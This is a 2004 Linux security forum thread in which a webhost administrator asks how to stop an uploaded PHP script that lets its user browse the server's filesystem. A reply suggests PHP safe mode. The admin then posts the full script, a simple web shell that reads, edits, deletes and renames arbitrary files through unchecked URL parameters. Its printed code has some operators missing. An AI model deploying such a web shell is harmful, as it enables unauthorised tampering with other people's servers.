LinuxQuestions.org

LinuxQuestions.org (/questions/)
-   Linux - Security (https://www.linuxquestions.org/questions/linux-security-4/)
-   -   Uploaded Script can view / (https://www.linuxquestions.org/questions/linux-security-4/uploaded-script-can-view-177161/)

Zoey_The_Cat 05-02-2004 09:37 PM
Uploaded Script can view /
 
I help administrate for a webhost. Recently a PHP script was uploaded and when executed, the person can see / and it's subdir's on the server. I'm pretty sure it's read-only, but I don't like it. How would I go about fixing it, so this isn't possible? I do have the PHP file if anyone needs to view it.

I can supply the server stats if needed.

Thanks!

david_ross 05-03-2004 03:05 PM
Welcome to LQ.

You can use php safe mode:
http://www.php.net/features.safe-mode

It would be worthwhile letting your customers know this is happening as some scripts may need modifying to work in this environment.

Zoey_The_Cat 05-03-2004 03:19 PM
Quote:
Originally posted by david_ross
Welcome to LQ.

You can use php safe mode:
http://www.php.net/features.safe-mode

It would be worthwhile letting your customers know this is happening as some scripts may need modifying to work in this environment.
Excellent, thanks.

Zoey_The_Cat 05-03-2004 04:02 PM
Well, I tried enabling it, and putting some of the commands that are in the offending PHP file into the 'commands-to-disable-unless-you-own-it' part, saved it, restarted Apache, but it appears to have done nothing.

Am I doing something wrong? :scratch:

Here's the script, if it helps:

PHP Code:

<?PHP
if(isset($_GET['file']) && isset($_GET['dir'])){
$fp = @fopen($_GET['dir'].$_GET['file'], "r");
$content = @fread($fpfilesize($_GET['dir'].$_GET['file']));
$content highlight_string($content1);
echo "<html><head><title>Read</title></head><body><a href='".$PHP_SELF."?dir=".$_GET['dir']."'>Go Back<br><a href='".$PHP_SELF."?edit=".$_GET['file']."&dir=".$_GET['dir']."'>Edit | <a href='".$PHP_SELF."?delete=".$_GET['file']."&dir=".$_GET['dir']."'>Delete | <a href='".$PHP_SELF."?rename=".$_GET['file']."&dir=".$_GET['dir']."'>Rename<br><br><p>".$content."</p></body></html>";
}elseif(isset($_GET['dir']) && !isset($_GET['file']) && !isset($_GET['edit']) && !isset($_GET['delete']) && !isset($_GET['rename'])){
if(substr($_GET['dir'], -1) == "/"){
$current $_GET['dir'];
}else{
$current $_GET['dir']."/";
}
$dir = @opendir($current);
echo "<html><head><title>Browsing '$current'</title></head><body>";
echo "Listing:<br><hr><br>";
while($file = @readdir($dir)){
echo $file." <a href='".$PHP_SELF."?dir=$current$file'>Open Dir | <a href='".$PHP_SELF."?file=$file&dir=$current'>Open File<br>";
}
@closedir($dir);
echo "<hr></body></html>";
}elseif(isset($_GET['edit']) && isset($_GET['dir'])){
if(isset($_POST['change'])){
$change html_entity_decode($_POST['change']);
$fp = @fopen($_GET['dir'].$_GET['edit'], "w");
$result = @fwrite($fp$change);
if(!$result){
echo "Error Writing File";
}else{
header("location: ".$PHP_SELF."?file=".$_GET['edit']."&dir=".$_GET['dir']);
}
}else{
$fp = @fopen($_GET['dir'].$_GET['edit'], "r");
$result = @fread($fpfilesize($_GET['dir'].$_GET['edit']));
$result htmlentities($result);
echo "<html><head><title>Editing '".$_GET['edit']."'</title></head><body><center><form action='".$PHP_SELF."?edit=".$_GET['edit']."&dir=".$_GET['dir']."' method='POST'><textarea name='change' rows='40' cols='60'>".$result."</textarea><br><input type='submit' name='submit' value='Edit'></form></center></body></html>";
}
}elseif(isset($_GET['delete']) && isset($_GET['dir'])){
$result = @unlink($_GET['dir'].$_GET['delete']);
if(!$result){
echo "File could not be deleted";
}else{
header("location: ".$PHP_SELF."?dir=.");
}
}elseif(isset($_GET['rename'])){
if(isset($_POST['change'])){
$result = @rename($_GET['rename'], $_POST['change']);
if(!$result){
echo "File could not be renamed!";
}else{
header("location: ".$PHP_SELF."?file=".$_POST['change']."&dir=".$_POST['dir']);
}
}else{
echo "<html><head><title>Rename</title></head><body><center><form action='".$PHP_SELF."?rename=".$_GET['rename']."&dir=".$_GET['dir']."' method='POST'><input type='dir' name='change' value='".$_GET['dir']."'><input type='text' name='change' value='".$_GET['rename']."'><br><input type='submit' value='Rename'></form></center></body></html>";
}
}else{
echo "<html><head><title>Get Directory</title></head><body><center><form action='".$PHP_SELF."' method='GET'><input type='text' name='dir'><br><input type='submit' value='Get Directory'></form></center></body></html>";
}
?>


All times are GMT -5. The time now is 09:21 AM.